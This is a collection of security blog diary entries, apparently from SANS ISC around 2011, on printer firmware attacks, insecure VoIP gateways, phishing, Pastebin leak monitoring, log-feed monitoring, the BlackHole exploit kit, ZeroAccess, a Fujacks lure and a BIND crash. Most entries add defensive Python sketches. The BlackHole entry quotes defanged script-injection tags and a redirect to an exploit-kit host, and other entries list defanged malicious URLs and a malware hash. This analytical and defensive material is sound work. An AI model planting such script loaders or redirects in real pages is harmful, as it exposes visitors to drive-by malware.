Hacking HP Printers for Fun and Profit

An MSNBC blog has published the recent findings of a study from Columbia University saying millions of HP printers are vulnerable to a "devastating hack attack".

In essence, the vulnerability is that HP LaserJet printers made before 2009 (according to HP; InkJet models are not vulnerable) do not check digital signatures before installing a firmware update. An attacker could therefore install specially crafted firmware remotely by embedding it in a crafted print job. The researchers demonstrated overheating a fuser to show what kind of physical damage could result (it charred the paper, but a safety mechanism shut it off before a fire started). Long story short: for an embedded system (or any system, for that matter), if you can rewrite the operating system, you control the device and can make it do all sorts of unintended things.

This isn't the first time HP LaserJet printers have had vulnerabilities, though it is the first time (that I recall, at least) that the firmware itself has been the attack vector. I think the severity of this vector is somewhat lower than portrayed, but it is worth noting, particularly for organizations that operate highly secure environments.

Best practices are likely sufficient to protect against this attack; namely, you should never have printers (or any other embedded device, for that matter) exposed to the Internet. In theory, you could create malware that infects a PC and then uses it to infect a printer, but I suspect such effort would be used only in rare circumstances. Beyond firewalling the device, you can monitor network traffic to and from it for anything other than print jobs, which should give an indication of a problem. For instance, any printer initiating an outbound TCP/IP connection is a sign that something is awry.
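To make that last check concrete, here is a minimal Python sketch. It assumes you can already export connection records from a firewall or flow collector into simple (initiator, destination, port) tuples; the `Flow` record and the optional allow-list are hypothetical placeholders, since some printers are legitimately configured to reach internal DNS, NTP or mail servers.

```python
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass(frozen=True)
class Flow:
    """One connection record; `src` is the side that initiated it (hypothetical format)."""
    src: str
    dst: str
    dst_port: int


def printer_initiated(flows, printer_ips, allowed=frozenset()):
    """Return flows initiated by a printer, except explicitly allowed (dst, port) pairs."""
    printers = {ip_address(p) for p in printer_ips}
    return [
        f for f in flows
        if ip_address(f.src) in printers and (f.dst, f.dst_port) not in allowed
    ]


if __name__ == "__main__":
    flows = [
        Flow("10.0.0.20", "10.0.0.21", 9100),   # workstation sending a raw print job
        Flow("10.0.0.21", "203.0.113.7", 443),  # printer calling out: suspicious
    ]
    for f in printer_initiated(flows, ["10.0.0.21"]):
        print("ALERT: printer", f.src, "connected to", f.dst, "port", f.dst_port)
```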

The study is a helpful reminder that even devices we don't think of as computers can be hacked, made to do things we don't intend, and used to compromise our security.

Do you monitor printers or other embedded devices in your environment for compromise or otherwise protect them? Take the poll and feel free to comment below.

--

John Bambenek

bambenek \at\ gmail /dot/ com

Bambenek Consulting

A Puzzlement...

Perhaps I'm getting old and unimaginative - but I just don't get it...

About a month and a half ago, I published a diary called "What's In A Name." In that diary, I discussed an interesting "hack," where additional names were added to DNS zone information as part of what appears to be an SEO (search engine optimization) scam.

Over the past month, I've seen several web app RFI (remote file inclusion) attacks that have been using "target files" hosted on machines with names like blogger.com.victimdomain.com or img.youtube.com.victimdomain.com. A little digging shows that these names also appear to have been added to DNS zones without the knowledge or permission of their owners. As in the first set of these I found, those names point to a completely different machine (in fact, in a different country) that has nothing at all to do with the main domain.

So, what's the point of using one of these names? What does this sort of obfuscation gain someone doing RFI attacks?

I'd love to hear some theories, because honestly... I'm stumped.

Tom Liston

ISC Handler

Senior Security Analyst, InGuardians, Inc.

twitter: tliston

P.S.: The folks at the web hosting company that I talked with were less than helpful. The contents of DNS were "confidential" and they could only respond to a "client complaint." So I'm left trying to explain to some poor, clueless, mom and pop outfit that they need to contact their web host and complain about something called "DNS." Lovely.

I keep hearing horror stories about how organizations treat people who contact them regarding security issues. Please make sure that *your* organization truly works with anyone who reports an incident. It's the frickin' holidays, after all...


Pentesters LOVE VOIP Gateways !

As someone who does vulnerability assessments, you always hope your clients are doing a good job with their security infrastructure. Theoretically, the perfect assessment is "we didn't find any problems, here's a list of our tests, and here's a list of things you're doing right". In practice, though, that *never* happens.

Also in real life, there's that private (or vocal) "WOOT" moment that you have when you find a clear path from the internet to the crown jewels. I can start anticipating that moment when I see a VOIP gateway in the rack - these allow remote VOIP sessions (either from a handset or a laptop) to connect to the PBX, through a proxy. VOIP vendors (all of them) sell these appliances as "Firewalls", and usually they have the word "Firewall" in the product name.

I had a recent assessment where we found that the VOIP gateway was based on Fedora 7, with all server defaults taken. Yes, that includes installing an Apache webserver, a DNS server and a Mail server. All unnecessary, all exploitable (given the vintage). Not only that, but they had enabled packet forwarding and SNMP, so not only did the unit forward packets from the internet to inside resources, it also advertised that fact through default SNMP community strings, along with the internal subnets themselves ! Oh, and source routing was enabled: sort of a pen-test trifecta !
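The forwarding and source-routing findings are easy to spot-check on any Linux-based appliance you have shell access to. Below is a minimal Python sketch, assuming the standard Linux procfs sysctl interface. It reads only the `all` source-route setting (per-interface values under `net/ipv4/conf/<iface>/` can also matter), and it treats forwarding as a finding because the device is supposed to proxy rather than route. SNMP exposure still needs a separate external scan.

```python
from pathlib import Path

# Linux sysctl keys tied to the findings above; a value of "1" means enabled.
RISKY_IF_ENABLED = {
    "net/ipv4/ip_forward": "packet forwarding is enabled",
    "net/ipv4/conf/all/accept_source_route": "source-routed packets are accepted",
}


def read_sysctls(keys, root="/proc/sys"):
    """Read sysctl values from procfs; keys that do not exist are skipped."""
    values = {}
    for key in keys:
        path = Path(root) / key
        if path.exists():
            values[key] = path.read_text().strip()
    return values


def audit(values):
    """Return one finding per risky setting whose value is '1'."""
    return [msg for key, msg in RISKY_IF_ENABLED.items() if values.get(key) == "1"]


if __name__ == "__main__":
    for finding in audit(read_sysctls(RISKY_IF_ENABLED)):
        print("FINDING:", finding)
```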

In another engagement, we found a gateway from a different vendor, based on BSD (good start), but with a similar litany of issues:

- SNMP enabled on the exterior interface

- Default snmp community string

- Routing enabled

- Internal interfaces and internal routes listed via snmp

- Source routing enabled

- Oh, and the admin interface (with vendor default credentials) was facing the internet - not that we needed that, it was already open!

- An expired, self-signed certificate.

- To top it all off, when you got to the admin interface, you were looking at the word "Firewall" in the product name ! (yeah, that made me smile too)

Not having actually seen the unit, I asked the client to check to see if it might have been hooked up backwards (with the private interface on the internet side) - alas, that was not the case, the "hardened" interface had these issues !

It's still *extremely* common to see voicemail servers based on SCO Unix or Windows 2000 (Windows NT4 in a recent assessment ! ). One vendor in particular still has a production, new-off-the-shelf voicemail server based on Win2k.

Mind you, all of the appliances had been in the rack for a number of years; the current crop of these devices is not nearly as open as some of the older ones. But that's actually part of the problem: people seem to consider voice systems (PBXs and ancillary equipment) as "appliances", somehow different from Windows or Linux servers. Which, as you've probably guessed, is not wise: they *are* Windows or Linux servers! They need to be patched, updated, monitored and included in every process that your internal, DMZ and perimeter servers see.

Even today, we see organizations trust appliances from vendors that don't place security at the fore. Then, once they are installed, they are promptly ignored, sometimes for years. These days, if it has an Ethernet jack, you should be asking security questions before it gets plugged in. And those security questions should be asked again, at least once or twice a year, in the form of an audit, assessment or pentest.

Anyway, all I can say is - when I'm looking for vulnerabilities, I LOVE (ok, I really really like) VOIP gateways !

... but you knew I'd be saying that !

==============

Rob VandenBrink

Metafore


It's Cyber Monday - Click Here!

Wait - What? Click Here?

It appears that our spamming friends are taking advantage of the Cyber Monday phenomenon, and trying to phish us into clicking links in the hope of getting that awesome deal on a watch, camera, tablet or laptop.

While there certainly are great deals and reputable vendors, my personal "spam / phish" email count is 8 so far today (and it's just 9am here in sunny Ontario, Canada). Emails that appear to be from a reputable vendor, but in order to actually get that great deal, yes, you guessed it - click here ! The link that they want me to click of course does not belong to the vendor that the email appears to come from.

In roughly half the cases, the link is close enough to fool lots of people. The other links are obfuscated in hex, so you can't tell where they lead unless you click them. Most of the illegitimate sites I've looked at are distributing malware, but really they could be anything. With the count rising by the hour, who has time to check them all out?
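Checking a link before you click can be partly automated. The Python sketch below decodes `%XX` hex escapes and then tests whether the link's host is really the vendor's domain (or a subdomain of it). The vendor domain you compare against is an input you supply; this does not handle every obfuscation trick (decimal IP addresses, HTML entities, redirector services), so treat it as a first filter only.

```python
from urllib.parse import unquote, urlparse


def link_host(href):
    """Decode %XX (hex) escapes and return the lower-cased host name of a link."""
    return (urlparse(unquote(href)).hostname or "").lower()


def looks_legit(href, vendor_domain):
    """True only if the link's host is vendor_domain itself or one of its subdomains."""
    host = link_host(href)
    vendor_domain = vendor_domain.lower()
    return host == vendor_domain or host.endswith("." + vendor_domain)


if __name__ == "__main__":
    # A look-alike host: it contains the vendor name but belongs to another domain.
    print(looks_legit("http://www.example.com.deals.test/watch", "example.com"))
```

Matching on the domain suffix, rather than on "contains the vendor name", is what catches the look-alike hosts that fool people.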

There are some good deals out there today, but please, shop responsibly! Check that link out before you click!

===============

Rob VandenBrink

Metafore


Quick Tip: Pastebin Monitoring & Recon

Happy Thanksgiving!

On the heels of Dr. Ullrich's diary regarding SCADA hacks published on Pastebin I thought I'd mention some Pastebin monitoring and recon resources that you may find useful.

One reader wrote in to say that you could use Google Alerts to monitor Pastebin for names and keywords of interest to you, but you may prefer a Google Custom Search instead. Configure it to monitor Pastebin and other similar sites; set names and keywords that are relevant for your needs.



Or, as Lenny pointed out in his July blog entry, you could use Andrew's PasteLert or PasteBin Scraper. And in case you weren't following along, Andrew --> Paterva --> Maltego --> Pastebin Transforms.

More than one SANS certification track curriculum discusses Maltego use for good reason. :-)
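If you'd rather roll your own, the core of a paste monitor is just "fetch the text, look for my keywords". The minimal Python sketch below assumes Pastebin's raw view at `https://pastebin.com/raw/<id>`. How you discover new paste IDs is left open, and you should check the site's terms and API documentation before polling it automatically. The keywords are placeholders for your own names and domains.

```python
import urllib.request


def fetch_paste(paste_id, timeout=10):
    """Download the raw text of one paste (assumes the /raw/<id> URL form)."""
    url = "https://pastebin.com/raw/" + paste_id
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def match_keywords(text, keywords):
    """Return the keywords that appear in text, compared case-insensitively."""
    lowered = text.lower()
    return [kw for kw in keywords if kw.lower() in lowered]
```

For example, `match_keywords(fetch_paste("wY6XD97L"), ["simatic", "yourcompany.example"])` would check one of the pastes mentioned in the SCADA diary, if it is still online.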

Any useful Pastebin crawling/scraping tactics you'd like to share? We await your comments or contact.


SCADA hacks published on Pastebin

pastebin.com has become a simple platform to publish evidence of various attacks. A few months back, Lenny noted that it may be useful for organizations to occasionally search pastebin for data leakage. Recently, an individual using the alias pr0f published evidence of attacking the South Houston water system.

This made me look for other "pastes" by pr0f. What I found:

More Simatic HTML (not clear where it comes from)

http://pastebin.com/wY6XD97L

A vacuum gauge configuration file from Caltech

http://pastebin.com/TgRTgrAK

A control system from smu.edu. Looks like power generation to me, but may be an experiment, not production

http://pastebin.com/HLNB6SAZ

Another paste, showing the (pretty good) password for a Spanish water utility, has since been removed.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Updates on ZeroAccess and BlackHole front...

Mpack, IcePack, Eleonore, Phoenix, BlackHole... from time to time we see a new exploit kit become prevalent due to the advances it brings. These are all well-known exploit kits that were (or still are) quite successful.





One of the most advanced exploit kits these days is the BlackHole Exploit Kit. It contains a lot of interesting features, such as a very detailed control panel and many configuration options, as the recent CP (Control Panel) screenshots above show.


So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.

The most common method used by BlackHole to spread is via links inside phishing emails.

For example:

1) Phishing email contains a link to a website

2) The website contains a redirection to a BH website

But recently they improved this method by adding another layer:

1) Phishing email contains a link to a website

2) The website loads four external scripts:

#h1#WAIT PLEASE#/h1#

#h3#Loading...#/h3#

#script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"##/script#

3) Each js.js contains a redirection to a final website that hosts the BH Exploit Kit:

-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';

That makes it really easy for the author to switch to new websites and, at the same time, makes a takedown harder.
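Because the intermediate js.js layer can be repointed at will, it pays to extract and block every layer, not just the final exploit host. The Python sketch below, using only the standard library, pulls `<script src>` URLs from a landing page and `document.location` targets from a script. It assumes you run it in an analysis sandbox on the raw (not defanged) content. The regular expression covers only the simple assignment form shown above, not obfuscated JavaScript.

```python
import re
from html.parser import HTMLParser

# Matches simple assignments such as: document.location='http://host/path';
LOCATION_RE = re.compile(r"""document\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


class ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag on a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lower-cases tag and attribute names
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def script_sources(html):
    parser = ScriptSrcParser()
    parser.feed(html)
    return parser.sources


def redirect_targets(js):
    return LOCATION_RE.findall(js)
```

Running `script_sources` on the landing page gives you the second layer, and `redirect_targets` on each fetched js.js gives you the final exploit-kit URL.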

After that, you already know what happens: it checks your system and selects the best exploit for it, such as a PDF exploit.

For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and Spyeye, but just recently it started to change...

That brings us to the second update: ZeroAccess.

ZeroAccess is not something new... in fact it has been around for some years, but it is showing some very interesting development.

In fact, when I first found it again a few days ago, I thought it was the TDL3 rootkit.

If you remember, TDL3 infects a different .sys driver on the system at each infection, and when you try to recover the .sys file, it hands you the clean file. That (among other things) is a characteristic the two have in common.



One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.

On some infections it may also download a spambot to keep spreading all kinds of spam, likely related to the Cutwail botnet.

The recent ZeroAccess trojan will also create the following folders on the system:

C:\WINDOWS\assembly

C:\WINDOWS\assembly\GAC

C:\WINDOWS\assembly\GAC_MSIL

Since it wants to make money via AdClicking, you will probably see this kind of traffic associated with it:

On the good side, since it has several items in common with TDSS, we have some good tools to find it as well.

The following tools were tested and worked quite well against ZeroAccess. Kaspersky TDSSKiller also offers a handy quarantine option if you want it.

Ah yes, remember that this removes only one trojan, and you still have at least a ZeuS running on the system... Isn't it a nice pack?

Btw, besides my regular twitter account, I created one to keep posting Security Indicators as I see them. The twitter is @secindicators if you are interested.

-----------------------------------------------------------

Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure


Monitoring your Log Monitoring Process

A review of this year's diaries on Log Monitoring

We write a lot about log monitoring and analysis. Some recent entries that focus on log analysis:

- Why you should monitor your logs: http://isc.sans.edu/diary.html?storyid=11068

- A collection of free/inexpensive log monitoring solutions people are using: http://isc.sans.edu/diary.html?storyid=9358

- A general approach to Log Analysis: http://isc.sans.edu/diary.html?storyid=11410

- A short series on log analysis in practice:

Monitor your log submissions

Today I wanted to focus on point 5 in Lorna's overview "Logs - The Foundation of Good Security Monitoring."

"Monitor your log submissions"

How do you know are still getting the logs you asked for, at the level you want and nothing has changed? This is probably one of the toughest areas and the one most often overlooked My experience has been that people hand folks an SOP with how to send their logs, confirm they are getting logs and then that is it. I have to say this is tough, especially in a large organization where you can have thousands of devices sending you logs. How do you know if anything has changed? How can you afford not to when so much is riding on the logs you get?

As she points out: when you have many devices submitting logs, how do you know you're getting all of the logs that you should?

Feed Inventory

You have to have a list of what feeds you are collecting. Otherwise you can't tell if anything is missing. Any further effort that doesn't include an inventory is wasted.

The inventory should track:

- the device

- the file-name/format that it's expected to deliver

- real-time or batch delivery

- delivery period (e.g. hourly, daily)

If you maintain this level of detail, then you can create a simple monitor system that populates two more fields:

- last delivery size

- last delivery time/date

Once you are collecting this simple level of detail, you can start alerting on missing files very easily. Just periodically scan through the inventory and alert on anything whose last delivery time is older than (current time - delivery period). For example, you could check every morning and look for anything that didn't drop overnight; this will work for a small shop running a manual check. Another environment may sweep through hourly and alert after 2 hours of silence.
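The inventory and the "older than (current time - delivery period)" rule fit in a few lines of Python. This is a minimal sketch; the `Feed` fields mirror the list above, and the optional `grace` parameter is an illustrative addition that expresses the "sweep hourly, alert after 2 hours of silence" variant (period of 1 hour plus 1 hour of grace).

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Feed:
    device: str
    file_format: str                   # e.g. "W3C web log", "syslog"
    realtime: bool                     # real-time vs batch delivery
    period: timedelta                  # expected delivery period
    last_size: int = 0                 # filled in by the monitor
    last_seen: Optional[datetime] = None


def stale_feeds(inventory, now, grace=timedelta(0)):
    """Feeds never seen, or whose last delivery is older than now - period - grace."""
    return [
        feed for feed in inventory
        if feed.last_seen is None or feed.last_seen < now - feed.period - grace
    ]


if __name__ == "__main__":
    now = datetime.now()
    inventory = [Feed("web01", "W3C web log", False, timedelta(hours=1), 2048, now - timedelta(hours=3))]
    for feed in stale_feeds(inventory, now, grace=timedelta(hours=1)):
        print("MISSING:", feed.device, feed.file_format)
```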

This will catch major outages. If there's a more subtle failure, where files are arriving but contain no real entries, you need to inspect the delivery size. A simple alert on 0-byte files will be effective, and I recommend that you have such an alerting rule in place. But I've seen instances where a webserver was delivering files that contained only the log header and no values, which a 0-byte rule would miss. This could indicate that traffic isn't getting to the webserver, which is something you might be interested in detecting.
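To catch the header-only case, count actual records instead of bytes. The minimal sketch below assumes a W3C extended log format (as written by IIS, for example), where header and directive lines start with `#`. Adjust `comment_prefix` for other formats.

```python
def count_entries(lines, comment_prefix="#"):
    """Count log records, ignoring blank lines and header/directive lines."""
    return sum(1 for line in lines if line.strip() and not line.startswith(comment_prefix))


def delivery_problem(size_bytes, lines):
    """Return a short description of an obviously broken delivery, or None."""
    if size_bytes == 0:
        return "empty file"
    if count_entries(lines) == 0:
        return "header only, no entries"
    return None
```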

A quick aside about units

I know I mention delivery size, but one could measure on any unit that you're interested in. A few that may suit your application:

- File size

- Alert/Event count (think IDS or AV)

- Line Count

You'll want to capture the unit in your inventory, since it's unlikely that you'll use the same unit for every feed (except for File size perhaps.) I'll continue referring to file size below, but keep in mind you could substitute any other unit.

Should you maintain a history?

Since you're capturing the time and size of each feed, it's probably tempting to simply keep a history of each feed. If you can afford it, I recommend it. This will allow you to go back if you need to and visualize some events better. You could make a pretty dashboard of the feeds and allow your eye to pick out issues. But what if you have several hundred feeds? We'll see below that while a history is nice, it's not required.

Simple Trending

Through the addition of one more field to the inventory, you can begin to track a running average of the delivery size. We'll call this the "trend" value. When you are updating the inventory, just take an average of the current delivery size with this trend value: (trend + current size) / 2. You can then set up alerts that compare the trend with the current size. For example a quick rule that will detect sudden drops in size is to alert when the current size is less than 75% of the trend value.

More than a few readers will spot that this is simply a special case of Brown's simple exponential smoothing (http://en.wikipedia.org/wiki/Exponential_smoothing) with the smoothing factor set to 0.5. If you want to tune your monitoring rules, experiment with the smoothing factor: replace my simple average above with:

new_trend <- (smoothing_factor * old_trend) + ((1 - smoothing_factor) * current_size)
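Here is the same rule as a small Python sketch, keeping the convention above: `smoothing_factor` weights the old trend, so 0.5 gives the plain average (trend + current size) / 2. Textbook formulas usually put the factor (often called alpha) on the current observation instead, which is the same thing with alpha = 1 - smoothing_factor. Seeding the trend with the first observed size is an assumption the text doesn't specify. The drop check compares against the trend *before* it is updated with the new delivery.

```python
def update_trend(old_trend, current_size, smoothing_factor=0.5):
    """new_trend = smoothing_factor * old_trend + (1 - smoothing_factor) * current_size."""
    if old_trend is None:  # first delivery: start the trend at the observed size
        return float(current_size)
    return smoothing_factor * old_trend + (1 - smoothing_factor) * current_size


def sudden_drop(current_size, trend, ratio=0.75):
    """True when the current delivery is below `ratio` (75%) of the trend."""
    return trend is not None and current_size < ratio * trend


if __name__ == "__main__":
    trend = None
    for size in [1000, 1100, 1050, 400]:
        if sudden_drop(size, trend):
            print("ALERT: delivery of", size, "bytes vs trend", round(trend))
        trend = update_trend(trend, size)
```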

If you're keeping a history of your feeds, you can experiment with the smoothing factor by plotting the size history against this smoothed version.

What about cycles?

It's almost certain that what you're logging is affected by human behavior. Web logs will ebb and flow as employees arrive at work, perhaps with a burst around lunchtime and a lull on evenings and weekends. Your log feeds are going to have similar cycles. Smoothing will account for subtle changes over time and, depending on your smoothing factor and the variance of your log sizes, it may respond well. But it will likely create a lot of false alarms, notably on Saturday and Monday mornings, when the shifts are larger. Expect a burst of alerts on holidays.

Depending on your sample period (e.g. daily, hourly), you'll see different cycles. A daily sample will hide your lunch rush, so you'll likely see a 7-day period in your cycles. An hourly sample will expose not only weekend lulls but also overnight spikes caused by your backup jobs.

You can address this by adding fields to trend the data. If you want to track the 7-day cycle, keep a trend value for each day of the week. If you want to account for hourly changes, add another 24, one for each hour. So at the cost of 31 more fields (7 + 24), you can have a fairly robust model for predicting what your expected size should be.
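A minimal Python sketch of those extra fields: one smoothed value per weekday and one per hour of day, each updated with the same rule as the single trend. Which bucket to compare against is a design choice the text leaves open; here, as an assumption, hourly feeds use the hour-of-day bucket and daily feeds use the weekday bucket.

```python
from datetime import datetime


class SeasonalTrend:
    """One smoothed size per weekday (7) and per hour of day (24): 31 extra fields."""

    def __init__(self, smoothing_factor=0.5):
        self.k = smoothing_factor  # weight on the OLD value, as in the rule above
        self.by_weekday = [None] * 7
        self.by_hour = [None] * 24

    def _smooth(self, old, size):
        return float(size) if old is None else self.k * old + (1 - self.k) * size

    def expected(self, when, hourly):
        """Expected size for a delivery at `when` (None until that bucket has data)."""
        return self.by_hour[when.hour] if hourly else self.by_weekday[when.weekday()]

    def update(self, when, size):
        d, h = when.weekday(), when.hour
        self.by_weekday[d] = self._smooth(self.by_weekday[d], size)
        self.by_hour[h] = self._smooth(self.by_hour[h], size)


if __name__ == "__main__":
    st = SeasonalTrend()
    st.update(datetime(2011, 11, 28, 9), 1000)              # a Monday
    print(st.expected(datetime(2011, 12, 5, 9), hourly=False))  # next Monday's expectation
```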

Prediction?

Yes, I said prediction.

If you're going to the trouble of tracking those 31 values, you can create a third-order (triple) exponential smoothing function, also known as Holt-Winters, and let it run one step ahead to predict the expected delivery size. You can then alert on cases where the predicted value differs widely from what was actually delivered. This is effective anomaly detection.
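For reference, here is a compact sketch of standard additive Holt-Winters. It is swapped in as one common form of triple exponential smoothing, not necessarily the exact 31-field scheme described above. It models a single seasonal cycle (e.g. `season_len=7` for daily samples or 24 for hourly ones). Its alpha, beta and gamma weight the *new* observation, the textbook convention, and the default values and 50% tolerance are illustrative only, to be tuned per class of feed.

```python
def holt_winters_forecast(series, season_len, alpha=0.3, beta=0.1, gamma=0.3):
    """Additive Holt-Winters: one-step-ahead forecast for the value after `series`."""
    L = season_len
    if len(series) < 2 * L:
        raise ValueError("need at least two full seasons of history")
    level = sum(series[:L]) / L                                       # average of first season
    trend = sum(series[L + i] - series[i] for i in range(L)) / (L * L)  # mean per-step slope
    seasonal = [series[i] - level for i in range(L)]                  # initial seasonal offsets
    for t in range(L, len(series)):
        x, s = series[t], seasonal[t % L]
        prev_level = level
        level = alpha * (x - s) + (1 - alpha) * (level + trend)
        trend = beta * (level - prev_level) + (1 - beta) * trend
        seasonal[t % L] = gamma * (x - level) + (1 - gamma) * s
    return level + trend + seasonal[len(series) % L]


def is_anomalous(actual, forecast, tolerance=0.5):
    """Flag a delivery that differs from the forecast by more than tolerance * forecast."""
    return abs(actual - forecast) > tolerance * abs(forecast)
```

Feed it each feed's size history. When the next delivery arrives, `is_anomalous(actual, holt_winters_forecast(history, 7))` tells you whether it "looks odd" for that point in the cycle.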

You'll have to tune the smoothing factors and seasonal factors for each class of feed, since I suspect the values you use for web proxies might not match what works best for IDS logs. But they should be consistent for general feed types. Once these values are set, your monitoring will not need any more tweaking; it will "learn" as time goes on and more samples are fed into it. And you'll have a system that will alert you when it "sees something odd." With a thousand feeds, having something point you to just the interesting ones is pretty valuable.

Don't Forget Content Checking

While I focused mostly on volume (mainly because it's universal to log feeds), do not ignore the content of the log files. While monitoring line counts and file sizes will catch outages, it will miss other logging errors that can cause a lot of trouble downstream in the monitoring and analysis process. When you ingest the logs into your monitoring system, it should check that the logs are in the correct, expected format. It can be a real headache when you realize that the log format changed on a system and you're no longer getting a critical field, for example the server IP address in a web proxy log.
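An ingest-time format check can start very simply: confirm the field count and validate the fields you depend on. The column layout in this Python sketch is hypothetical (a space-separated proxy log). Substitute your own, ideally derived from the `#Fields:` line if your format has one.

```python
import ipaddress

# Hypothetical column layout for a space-separated web proxy log.
EXPECTED_FIELDS = ["date", "time", "client_ip", "server_ip", "method", "url", "status"]


def check_line(line, expected=EXPECTED_FIELDS):
    """Return a list of problems with one log line (an empty list means it looks OK)."""
    parts = line.split()
    if len(parts) != len(expected):
        return [f"expected {len(expected)} fields, got {len(parts)}"]
    record = dict(zip(expected, parts))
    problems = []
    for field in ("client_ip", "server_ip"):
        try:
            ipaddress.ip_address(record[field])
        except ValueError:
            problems.append(f"{field} is not an IP address: {record[field]!r}")
    if not record["status"].isdigit():
        problems.append(f"status is not numeric: {record['status']!r}")
    return problems
```

Alerting when the share of failing lines in a delivery jumps is usually more useful than alerting on every bad line.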


FBI Seeking Victims in Operation Ghost Click/DNS Malware Investigation

From their press-release:

The FBI is seeking information from individuals, corporate entities and Internet Services Providers who believe that they have been victimized by malicious software (“malware”) related to the defendants. This malware modifies a computer’s Domain Name Service (DNS) settings, and thereby directs the computers to receive potentially improper results from rogue DNS servers hosted by the defendants.

If you believe that you are a victim in this case, the FBI wishes to hear from you. Submit your report here: https://forms.fbi.gov/dnsmalware

For more information about Operation Ghost Click:

- http://isc.sans.org/diary/Operation+Ghost+Click+FBI+bags+crime+ring+responsible+for+14+million+in+losses/11986

- http://www.fbi.gov/news/stories/2011/november/malware_110911


Fujacks Variant Using ACH Lure

During my shift we received an email claiming to be from "The Electronic Payments Association" with the subject "Rejected ACH transfer." It informed us that our ACH transfer was "canceled by the other financial institution," and provided a link to the supporting documentation.

If you click on the link (hXXp://masterwall.com.au/8ymksg/index.html; I'm sharing the link so you can check your logs), you'll go on a short trip through a few sites (and pull down some Google Ads; Google, you might want to look at who's making money off of that), and if you're running a system vulnerable to CVE-2010-1885, you'll eventually install a loader for what Ikarus is calling Worm.Win32.Fujack.o.

I've spent more time informing webmasters than really analyzing the code, but that's usually how it goes.

The owners of the defaced sites have all been informed. I've sent a message to the main hosting site as well (but don't expect an answer).

The particular indicators for this event:

Initial defaced site: hXXp://masterwall.com.au/8ymksg/index.html

Intermediate sites can be pulled from the wepawet report here: http://wepawet.iseclab.org/view.php?hash=26a057f6807d39560631bfe7039d78ad&t=1321628919&type=js

The endpoint (the one you want to block and search your logs for): hXXp://aquasrc.com/w.php?f=100&e=8

The MD5 of what I pulled down: b4d9e3639b1bb326938efd9b6700f26d
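The Python sketch below is one way to sweep logs and suspect files for these indicators. The hostnames and MD5 are copied from this diary (defanged above as hXXp). Add the intermediate hosts from the wepawet report yourself. The substring match is deliberately crude and can flag look-alike hostnames, so review the hits by hand.

```python
import hashlib

# Indicators from this diary; extend with the intermediate sites you extract.
BAD_HOSTS = {"masterwall.com.au", "aquasrc.com"}
BAD_MD5 = {"b4d9e3639b1bb326938efd9b6700f26d"}


def md5_of(path, chunk_size=65536):
    """MD5 hex digest of a file, read in chunks."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def is_known_sample(path):
    return md5_of(path) in BAD_MD5


def log_hits(lines, bad_hosts=BAD_HOSTS):
    """Yield (line_number, host) for each log line that mentions an indicator host."""
    for n, line in enumerate(lines, start=1):
        lowered = line.lower()
        for host in sorted(bad_hosts):
            if host in lowered:
                yield n, host
```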

This will install itself on the victim's machine and autostart after reboot, it will also try to spread via internal network shares.

I haven't spotted what it uses for its command and control yet, so all I know for certain is that it spreads. I hope to update this later with the C&C server details.


Recent VMware security advisories

VMware released a new advisory and updated an existing security advisory yesterday.

- VMSA-2011-0014: http://www.vmware.com/security/advisories/VMSA-2011-0014.html

- VMSA-2011-0013.1: http://www.vmware.com/security/advisories/VMSA-2011-0013.html


Potential 0-day in BIND 9

Internet Systems Consortium has published an alert stating that they are investigating a potential vulnerability in BIND 9. There are reports of the DNS server software crashing while generating a log entry: "INSIST(! dns_rdataset_isassociated(sigrdataset))". Details are rather limited at this point; aside from the DoS effect, it's unknown whether code execution is possible.

Reference - http://www.isc.org/software/bind/advisories/cve-2011-tbd

Update:

ISC would appreciate network captures of active attacks against this BIND vulnerability. Please submit them to us via the Contact Form.

Update 2:

Patches are now available:

http://www.isc.org/software/bind

https://www.isc.org/software/bind/advisories/cve-2011-4313

Update 3:

There have been a number of reports of people being affected. If you are one of them and have some packets to share, we would appreciate it. We'll anonymise any identifying info.

Thanks

Mark

Update 4:

Several honeypots have been hit with unsolicited recursive DNS queries. Whilst the query itself is normal, it is possible that this is part of a scan looking for servers that may be vulnerable. If you happen to be monitoring your DNS and you notice a recursive request, let us know. If you can share information, that would be great. Ideally a capture, but the source and the domain requested will be enough for now.
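A query asks for recursion when the RD (Recursion Desired) bit, 0x0100 in the 16-bit flags field of the DNS header (RFC 1035), is set. The Python sketch below pulls that bit and the queried name out of a raw UDP payload. It assumes you already have the payload bytes from your capture tool of choice. It handles only a plain, uncompressed question name, which is what a normal query carries. On an authoritative-only server or a honeypot, a set RD bit is the signal worth reporting.

```python
import struct


def parse_dns_query(payload):
    """Return (recursion_desired, qname) for a raw DNS query (UDP payload only)."""
    if len(payload) < 12:
        raise ValueError("too short for a DNS header")
    _txid, flags, qdcount = struct.unpack("!HHH", payload[:6])
    if flags & 0x8000:                       # QR bit set: this is a response
        raise ValueError("not a query")
    recursion_desired = bool(flags & 0x0100)  # RD bit
    labels, pos = [], 12                     # question section starts after the header
    if qdcount:
        while True:
            length = payload[pos]
            pos += 1
            if length == 0:                  # root label ends the name
                break
            if length & 0xC0:
                raise ValueError("compressed name not expected in a query")
            labels.append(payload[pos:pos + length].decode("ascii", errors="replace"))
            pos += length
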